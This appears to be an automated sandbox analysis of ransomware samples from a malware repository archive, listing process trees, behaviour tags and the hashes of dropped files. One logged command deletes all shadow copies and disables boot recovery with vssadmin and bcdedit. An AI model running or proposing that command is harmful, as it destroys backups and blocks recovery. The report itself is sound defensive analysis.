                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6844
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding D77E7BA0BFA3CC14294A227F79EAE266 E Global\MSI0000
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in Windows directory
                                                                                          PID:4892
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Xyeta.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\Xyeta.exe"
                                                                                        1⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5124
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 472
                                                                                          2⤵
                                                                                          • Program crash
                                                                                          PID:7044
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5124 -ip 5124
                                                                                        1⤵
                                                                                          PID:6788
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\$uckyLocker.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\$uckyLocker.exe"
                                                                                          1⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6932
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          PID:4452
                                                                                          • C:\Windows\system32\vssadmin.exe
                                                                                            vssadmin.exe delete shadows /all /quiet
                                                                                            2⤵
                                                                                            • Interacts with shadow copies
                                                                                            PID:3308
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit.exe /set {default} recoveryenabled no
                                                                                            2⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:2336
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                            2⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:3904
                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                          C:\Windows\system32\vssvc.exe
                                                                                          1⤵
                                                                                            PID:5740
                                                                                          • C:\Windows\system32\OpenWith.exe
                                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:6120
                                                                                          • C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe
                                                                                            "C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe"
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:6444
                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                            C:\Windows\system32\AUDIODG.EXE 0x0000000000000500 0x000000000000048C
                                                                                            1⤵
                                                                                              PID:6548

                                                                                            Network

                                                                                            MITRE ATT&CK Enterprise v15

                                                                                            Downloads

                                                                                            • C:\Config.Msi\e5b222d.rbs
                                                                                              Filesize: 100KB
                                                                                              MD5: 8e7bc14dc2a25f320fd08041e3a1371b
                                                                                              SHA1: 1854d82f39d1e4879cd08d4f8ab5dd6e37a505dd
                                                                                              SHA256: 33d260036c2488e2ce2b90fdece3395458bd18c42b93e01c03899b37e24d45fa
                                                                                              SHA512: 7e3adf460714fa133a232fe0354734f329668452c1e3071ce49e743a88548820675a36fa719b0c8fa61f1deb2b7504d7c48ce83450149eab432a5c153b34318c

                                                                                            • C:\ProgramData\KOcUocAg\fgMkMoUs.exe
                                                                                              Filesize: 179KB
                                                                                              MD5: 7ab1a67b2fccc7ca80740cb0160ac6d6
                                                                                              SHA1: 898f5b3a2d9145a3e3c06a59c5ea7d9c7c89a706
                                                                                              SHA256: fbf58f600004392ed358b7a543d54a0e2f131523a00802aa444c20f1f76fb9b1
                                                                                              SHA512: a0e70123af65544518d9e0f28590b164f7ba4dfe28d73fe91d90231318e517a143a8aedb2c92c327f3f80127d23bc51343a2373f3f8bb104aa11da21aca29272

                                                                                            • C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.exe
                                                                                              Filesize: 238KB
                                                                                              MD5: 6752adb0443fa0a8e29c8c9ce62a5f85
                                                                                              SHA1: 8a84dbc333beb7cc6dfaacf43b41accacb4c6e40
                                                                                              SHA256: 269009850eab46eda04cecf5e96b20f8ed4dd5e59f95576a2b009d9b3687e752
                                                                                              SHA512: 9062e36b1e671ade4984557ef6cacea5806fefa126a2390bf39eea4e9c6362cbda7c7079ebf4b797c061f06d07d57594be9244d610ebf98df23e3ab3bfa03979

                                                                                            • C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.exe
                                                                                              Filesize: 323KB
                                                                                              MD5: 003300e1006145ebb1993e8088ff9586
                                                                                              SHA1: 63ee747b47b2e40535ccaa3ecf1408c224cab22d
                                                                                              SHA256: cd9dfd3abd543c5e7b2da08883b4dfa83ed8c12c34dde89f127a9797ab546301
                                                                                              SHA512: 51f040dbff7c22a2269ff428ddd625dbdb0de49976a43abd616ac51351c8f928399b3ff6c2418899f0062252aaa71ff2ad9f97e3c5fb92509621c053f73fcf6e

                                                                                            • C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\VC_redist.x86.exe
                                                                                              Filesize: 838KB
                                                                                              MD5: 72949c8189966f673a4db965a97c1566
                                                                                              SHA1: e7420d47ecb16ae86616deba1ba2ae7294bc5baf
                                                                                              SHA256: 5126532a82222ee46d00334be4dae2a8f07a4603dddebb36e6823b0d81232bc1
                                                                                              SHA512: bab38d40a922c35c961e4b2f54fe922de6a9d1c262619eddcdffecfcdf0be73791aff71ce38c32c60fb65c431a985048bb456abd732c34c72cfdfbdebf97dffe

                                                                                            • C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
                                                                                              Filesize: 818KB
                                                                                              MD5: 64ffbeb18cf41185221946ce72e50b0f
                                                                                              SHA1: 1ade0c8c1f83707a5196b2c78d823da1415045ab
                                                                                              SHA256: 097c6acb8e4f95c6e48696b4a43c34d13bafe57ef69c8f2f6de61607bec13663
                                                                                              SHA512: eab2cf902cd10f1911993ecffc629096a5eb113d55ef44ba11641804b37147dd82ab7392f35027c890534352ec5b63262d909698ad34637b6092892298995b30

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                              Filesize: 152B
                                                                                              MD5: 554d6d27186fa7d6762d95dde7a17584
                                                                                              SHA1: 93ea7b20b8fae384cf0be0d65e4295097112fdca
                                                                                              SHA256: 2fa6145571e1f1ece9850a1ac94661213d3e0d82f1cef7ac1286ff6b2c2017cb
                                                                                              SHA512: 57d9008ccabc315bd0e829b19fe91e24bab6ef20bcfab651b937b0f38eec840b58d0aed092a3bbedd2d6a95d5c150372a1e51087572de55672172adc1fc468a7

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              a28bb0d36049e72d00393056dce10a26

                                                                                              SHA1

                                                                                              c753387b64cc15c0efc80084da393acdb4fc01d0

                                                                                              SHA256

                                                                                              684d797e28b7fd86af84bfb217d190e4f5e03d92092d988a6091b2c7bbbd67c1

                                                                                              SHA512

                                                                                              20940fee33aa2194c36a3db92d4fd314ce7eacc2aa745abec62aa031c2a53ba4ff89f2568626e7bd2536090175f8d045c3bb52c5faa5ecc8da8410ab5fc519f7

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                              Filesize

                                                                                              3KB

                                                                                              MD5

                                                                                              99df65dc17cdd9875802c558de75a7b3

                                                                                              SHA1

                                                                                              b33be5b64245e248c193e5b9f770a1fde45b5037

                                                                                              SHA256

                                                                                              ac923742a04e70eddb0af8fe10d1b45c7fc567b371ff6eb08a7c783fa9165a57

                                                                                              SHA512

                                                                                              c0e0a4c3234afabf92ff85a59811a95c6a2ae2d878f70a73d314cf5f8410a670a4f3b47b5fb1946503c86155729f82ae75b3b3583cdea14e3808d256e3179b3a

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              2ff42633db25cb7a68248bc5605635ac

                                                                                              SHA1

                                                                                              1f124b799e9ee0b604e467a40679def8201acb41

                                                                                              SHA256

                                                                                              be4528af2fe5e8153d4c4de953dc0d01801baf038a8810dfde7ae90569031b6f

                                                                                              SHA512

                                                                                              7a7d1ece5564eb0f7b4ce57af95ee0690faf5f23d61af5ee6d5a8a66cf7f223c6af32c2339633e88731a22a4d1368e1ff7cf4c6d4778aaad5f2305ebbe1f7620

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                              Filesize

                                                                                              111B

                                                                                              MD5

                                                                                              285252a2f6327d41eab203dc2f402c67

                                                                                              SHA1

                                                                                              acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                              SHA256

                                                                                              5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                              SHA512

                                                                                              11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              5KB

                                                                                              MD5

                                                                                              17cedb4fe3ed55e9218070f58458e1ee

                                                                                              SHA1

                                                                                              be0a8da2aa40e80d0ea30e357375264651f8c17e

                                                                                              SHA256

                                                                                              2bc9eaf7d5ba81b1377f3fa627737ea11e7f08bb22d0b904e952d45fbf825219

                                                                                              SHA512

                                                                                              bb02c73a3a5ae416d719aa8220b9078e425f6d86fc94e699a0a0d871c4295c9148b64b8ffabd6dc3fd05cd32e4b536b5ce79563074e7d16bd5572ea8ff034e9b

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              d608f7ff4df99ab241f006d4e8403dff

                                                                                              SHA1

                                                                                              0acb87cb6cbc783c4add4f66d52f307729a046f3

                                                                                              SHA256

                                                                                              9903306bc07b3f208c88a8d2c91e75080c7cf11624aeb4edfe00188d4f3be2fb

                                                                                              SHA512

                                                                                              c1524d8fec3236a680a5e55f0b8a2dcb6eaf07b00afd43d6760131c0500ce21debd12089e19463fd999fcf94381e398483a198d0289e284f81f5186d3dffbeaa

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              4a6ddcf5518f73438c88c0ed747b34b2

                                                                                              SHA1

                                                                                              baba5efb3374074ec250b8842f831e02d14bf140

                                                                                              SHA256

                                                                                              9dc3299edfde9b01a652f1e1f267b818f9048b4179916838df90485f5ee10e7c

                                                                                              SHA512

                                                                                              cc07ed3833b80afc0b5b181046ad82dd7e4b6a773eb0cc49811a744a62a6f162d17c79c8c673d77e396e12e8913c64b7e892c0cf797c96f8b93716bab77b7011

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              56322b8161aa0a80c24d0cd57e8e87e0

                                                                                              SHA1

                                                                                              ee1373bcdab6797435b4a1f52378fd95c0800c29

                                                                                              SHA256

                                                                                              6c6dd857da55c89ae96bbb10a8cedbba5ee60cfa44283f7d1c087c7892f8b9b3

                                                                                              SHA512

                                                                                              2378e3dfe5c518ffa18ffa7d35af1b0d0df01c8c10575e9cb377bd798e4c6213f9ff1b5f96b1baffe6cd94ee9091aae80a2218773a2c738eabf7da529ffcfd18

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              5fb865be4ba366e073e1aa6f3b9dad70

                                                                                              SHA1

                                                                                              82435ab7d5e7389791ba40bdee4b8011a848da2d

                                                                                              SHA256

                                                                                              0003dad800523f05baccf661ec72adaabc36119687c58c5f44e2f8e6a33d92eb

                                                                                              SHA512

                                                                                              f08ee7d2b616d1b2549ae486a15b03636385558a27130cdb5661b31170957686744520f282a71ce7833141b3e62e88808a089e082d52469531c375d37c19a5fa

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              c7d0721e6560948d6a9ceb661e9ef0b8

                                                                                              SHA1

                                                                                              574ac23f253a4a990c9a379623ef71dafc2cec6d

                                                                                              SHA256

                                                                                              18107b8bd3b3b404a57bc182c24e3ee6dd2a246af08ef3629039672488d9dab0

                                                                                              SHA512

                                                                                              c91f4f9e4f23526d04ac99749d9f36653bb5aaaa451dc2ec9218ad34361c725434a8b79ebb5de8491628eba8369f9d52b7cddcda05f3cba11deab878b3d22709

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              5cf321e61c5dce515311ce6b17a8c188

                                                                                              SHA1

                                                                                              3959856a6bd3bf03a360641a6bb87d457fdb8577

                                                                                              SHA256

                                                                                              2aba5ee9431a2df46fddb1fdad1b2b4a7235ae5c058afb66ea8784b14c8e578d

                                                                                              SHA512

                                                                                              24d86bde410aa885e2c98c7aa07425d5f9350c4c275e2986280f0451075fcc73166533a46087177970ff8be1d245af71d18d09da174a4d913baf536485a11ae3

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5820c2.TMP

                                                                                              Filesize

                                                                                              203B

                                                                                              MD5

                                                                                              73cebd290f620d4b0eb1082673438bdb

                                                                                              SHA1

                                                                                              8f7a0f16f7d7268a0778a27114d596d29da74f1f

                                                                                              SHA256

                                                                                              9afd86c946d08bd908873241f3675d90162b374e41e8781abd836df6c7e0c1a0

                                                                                              SHA512

                                                                                              1b359c3305bc446a4c9c114c94e1d1a11a51565e28e29d0f577ad1b713351f2550d0c402fd8bde811158fa3640720047d96bb1d95ca1bb2e5aa4fceecc13bee2

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                              Filesize

                                                                                              16B

                                                                                              MD5

                                                                                              6752a1d65b201c13b62ea44016eb221f

                                                                                              SHA1

                                                                                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                              SHA256

                                                                                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                              SHA512

                                                                                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                              Filesize

                                                                                              11KB

                                                                                              MD5

                                                                                              9156b3a3a853ec71ddf6c8873d8d73eb

                                                                                              SHA1

                                                                                              dd7763fed6ed5b78041b630530010e7b91c591c2

                                                                                              SHA256

                                                                                              5a601a8f3342aadd43b932e634b739b35b1009392f2a514e6eb73c7f49455fb2

                                                                                              SHA512

                                                                                              f5d2462f7aeed29057d96a79da0f309075d15075f4b2dea085b8912ebb71e326592a664b2f91624cb227939afac1290d922dffb4bb4c8354db9bf1b5ffb68fa1

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                              Filesize

                                                                                              10KB

                                                                                              MD5

                                                                                              555ac4087887ca1d018f04fba2574609

                                                                                              SHA1

                                                                                              16a2a849a2e31e4015b170435eafebe3801d8138

                                                                                              SHA256

                                                                                              2fab0c598337a71244c03f589c1989325ab52d58fb90f4e6b8f8099c6eda4a4e

                                                                                              SHA512

                                                                                              ccba7b8d63db79a4bbdc424bec8ce33dfa3758222d56a1cd3ab952ae2d387e87d3332815cc41db31111bd51e2630fd6ae1b41e08f6f2f17939fd8444959b94de

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                              Filesize

                                                                                              10KB

                                                                                              MD5

                                                                                              0dca492dcd5ce8020ae432c1e20fbaa5

                                                                                              SHA1

                                                                                              07a0cdfa8517ad2e25cfc84cbf7a9aa15c0a73b8

                                                                                              SHA256

                                                                                              6099def2ef052d01083a90ea517a0bfae17faa823af3f4adfb2c6af9c251211c

                                                                                              SHA512

                                                                                              f61e7f686852e52208358b8187588809c611bb4c187480bba3ab22a238a914617792c463f7887988c06a6c325c260d3e67d50cb91648972f1cb9a3b8ff935d08

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                              Filesize

                                                                                              11KB

                                                                                              MD5

                                                                                              992b081e3b19dc6398ddaa2e3941b0ac

                                                                                              SHA1

                                                                                              dad9639751086f51d7d5fdf1eb5bf613478d29f4

                                                                                              SHA256

                                                                                              8f51df9f071e4826aaaf2912b7029cd4a6797348d7237198275aaa11ce357425

                                                                                              SHA512

                                                                                              4138ec0fdb361f83f74afb8180ea5133437d3b9413cb48dd88c0993e90b95bbebd498a005a97059b96f02169ae24af4f5d55b59946e81ef7400e39bc61a8711e

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

                                                                                              Filesize

                                                                                              84B

                                                                                              MD5

                                                                                              d4ac6cf0c69bc7a1bd9f3102e4663a9c

                                                                                              SHA1

                                                                                              424bdfb2c137663f33c4ba306bfb4f69a99e2f63

                                                                                              SHA256

                                                                                              ab485b2bec42445a066d306010803ed4bad51151ac3da931b4f4043e29eae6bc

                                                                                              SHA512

                                                                                              2b16031e5d43f18de601feba1eccf51aaf11dc1830a154ddd10552a9f32bf8202ca06fd5373a6045f94556c27403131c3357ab2dc1c063dda3458538ec7f16fc

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

                                                                                              Filesize

                                                                                              84B

                                                                                              MD5

                                                                                              df7a122d9b2f36e8e0554587909b9fff

                                                                                              SHA1

                                                                                              d51630656ed6249a782d3676f447737ab9f7e2ab

                                                                                              SHA256

                                                                                              ef142b09342c90ac9438aa97dd7685bef8b9f687c042b5e3eb987506e86d71a0

                                                                                              SHA512

                                                                                              9a246b14f2e02b8e64e58d9bb39eb10ea6389e664b2d91a1a35cecb512ad1247d77e275bd0c105f41ac622885bb89733553dad4579e6a42c07dcb5b2b9810948

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\{F85582CD-32BD-4EF5-9628-06446481E4FD}.session

                                                                                              Filesize

                                                                                              4KB

                                                                                              MD5

                                                                                              6386e01ee397940499e5a80f7f398ed6

                                                                                              SHA1

                                                                                              de09f79a3db0cf7a5c02a1189ea70c4feb3725fc

                                                                                              SHA256

                                                                                              cbd0190283e30d251dd1a02f252d1329fe94b9e6e5a64ec9d65e2e0d557c0ab6

                                                                                              SHA512

                                                                                              9f7876d323a9e65ead7ffa8fb56e389967a38eae9f833272cf008c2bb90b388635c7823ac3798daa3ad651dea844e00c2f87e7d179c3576858c12c0af1215fb5

                                                                                            • C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\{F85582CD-32BD-4EF5-9628-06446481E4FD}.session

                                                                                              Filesize

                                                                                              4KB

                                                                                              MD5

                                                                                              91ae062b409a63478803b76416e06708

                                                                                              SHA1

                                                                                              7e05be4a2725e3eecee9a50baf4ccb08fff27c94

  SHA256: 5d4290ad595249fd3c36d5948060b9e09e152d654ac6d6bbbe758327c0f6449f
  SHA512: ca5e0edef06c29045fe21c76400b02d3c3f89c20939e509ef4f3db10872901b9ce1cec80e3a0eded5e456f8b31ec74962dfed94d708746c5209c0d8c396f1873

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\!WannaDecryptor!.exe.lnk
  Filesize: 1KB
  MD5: 6f62c03dd85f4a495b8be9b43b78c5b3
  SHA1: d5faa9d35868fe83ebf4fe559511ab5cd07e0f5b
  SHA256: 4f0dc738d75b3fe8915891245d4d2f59d1f58fd4d3e7dfb5c9c8d3ede82abfd2
  SHA512: a5f97a3aef77a449b8459608732ab3bf429114096bf02d1461926d78c1c9ccc08e6945a3b6e7e7437fcbc4da46ee28f1294d7c3de7bb6cc4922d6a52e23e0519

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\00000000.eky
  Filesize: 1KB
  MD5: 30b193ab44967f401d78a68077a4cd2b
  SHA1: 8fb3036e66dbc62578ed5f9e4a96ce577ea4b55d
  SHA256: bb7efe0f0d1dd4881f23ae1404369980556fe077304c1975b5d92dab2004db08
  SHA512: f2abdd92cb12cc8232ab906cfcc6d14422ff9e17fd09645acd96834ae70410974b0641483efaa1403509673cce8822b20e2b8b24684309354bf5fb552a648a2d

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\00000000.pky
  Filesize: 276B
  MD5: 7683545a3a4e2aafb995f0ab81eaed88
  SHA1: e5136c3f9a0364052aac6fc2b32f183271202f9d
  SHA256: b52b9f33550069805e8bd6c5f0ff63fb5460c6186e579561a31bc7bde7d836f5
  SHA512: c8aa35229641920f0631c6d069a66247682873f57d0b97096a5ab9144aa781592ffc81f487e43ceae0cc3cfca349bce29d94901706e7fc0ab3f5156b7180a56c

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\00000000.res
  Filesize: 136B
  MD5: c957a34f19801e0591ca27a51f554970
  SHA1: 5015dcba831d0bda64a3ae6d0349cddeaaf7c468
  SHA256: e92260f3cd7dbe60d7babcc243f4422aa26e0c1d7599793600f93ea9060b6ae6
  SHA512: bffdd63bcddf198af28e992e9b9d6189b16ee06981e958cb992390deaab988dbdd5856edee51c3ff52e7beeee25e5a6470fa0ef6f34514a04f9fdf8d25b79821

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\36341738422429.bat
  Filesize: 474B
  MD5: 8c747809f440565ae31ff56fc6ee3726
  SHA1: ef010d0ba47bd09652b4910e72ddac78e3c76cf4
  SHA256: 38de07ecb4fd6c81a4b4d0d5e9a30feac3bba198eccdee8271fef4ae005dc9d1
  SHA512: cc3637528185ddc8a3e6b79aeb3945ca67282d9588a552606547bbef88a77e8195e50a29aa676041fb2263651fde4986f74011acbc3eb49923d7f250b01759ca

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
  Filesize: 933B
  MD5: 7a2726bb6e6a79fb1d092b7f2b688af0
  SHA1: b3effadce8b76aee8cd6ce2eccbb8701797468a2
  SHA256: 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
  SHA512: 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
  Filesize: 240KB
  MD5: 7bf2b57f2a205768755c07f238fb32cc
  SHA1: 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
  SHA256: b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
  SHA512: 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\TaskData\Tor\tor.exe
  Filesize: 3.0MB
  MD5: fe7eb54691ad6e6af77f8a9a0b6de26d
  SHA1: 53912d33bec3375153b7e4e68b78d66dab62671a
  SHA256: e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
  SHA512: 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
  Filesize: 6KB
  MD5: 76e08b93985d60b82ddb4a313733345c
  SHA1: 273effbac9e1dc901a3f0ee43122d2bdb383adbf
  SHA256: 4dc0a8afbf4dbb1a67b9292bb028b7f744f3029b0083c36307b1f84a00692a89
  SHA512: 4226266b623d502f9b0901355ff388e1fc705e9baff0cbe49a52ef59578e1cc66f5026c030df4c8a8f5000b743523ccf18c533aee269b562d3017d14af014f9d

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
  Filesize: 194KB
  MD5: 8803d517ac24b157431d8a462302b400
  SHA1: b56afcad22e8cda4d0e2a98808b8e8c5a1059d4e
  SHA256: 418395efd269bc6534e02c92cb2c568631ada6e54bc55ade4e4a5986605ff786
  SHA512: 38fdfe0bc873e546b05a8680335526eec61ccc8cf3f37c60eee0bc83ec54570077f1dc1da26142488930eabcc21cb7a33c1b545a194cbfb4c87e430c4b2bfb50

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\b.wnry
  Filesize: 1.4MB
  MD5: c17170262312f3be7027bc2ca825bf0c
  SHA1: f19eceda82973239a1fdc5826bce7691e5dcb4fb
  SHA256: d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa
  SHA512: c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\c.vbs
  Filesize: 357B
  MD5: d20fdcc99bb6d4f26f0d22266e855c4a
  SHA1: 5a3ce3d72c0ce3d857188fc9e26a11076eeec91c
  SHA256: e1060f60ad87c2bf95f68cda720055265855c878dc9d572872677a2ad1159605
  SHA512: 4f11b2316abbc28d80e77aef1494fae55abcf3bc116429702d32bf423b9b5c9162be63d78361810204a1fbb363c6ab65c000e51c550e36634c0feaf21cf6debd

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\msg\m_finnish.wnry
  Filesize: 37KB
  MD5: 35c2f97eea8819b1caebd23fee732d8f
  SHA1: e354d1cc43d6a39d9732adea5d3b0f57284255d2
  SHA256: 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
  SHA512: 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

• C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\u.wry
  Filesize: 236KB
  MD5: cf1416074cd7791ab80a18f9e7e219d9
  SHA1: 276d2ec82c518d887a8a3608e51c56fa28716ded
  SHA256: 78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
  SHA512: 0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

• C:\Users\Admin\AppData\Local\Temp\file.vbs
  Filesize: 19B
  MD5: 4afb5c4527091738faf9cd4addf9d34e
  SHA1: 170ba9d866894c1b109b62649b1893eb90350459
  SHA256: 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
  SHA512: 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

• C:\Users\Admin\AppData\Local\Temp\hgkwogkQ.bat
  Filesize: 112B
  MD5: bae1095f340720d965898063fede1273
  SHA1: 455d8a81818a7e82b1490c949b32fa7ff98d5210
  SHA256: ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
  SHA512: 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

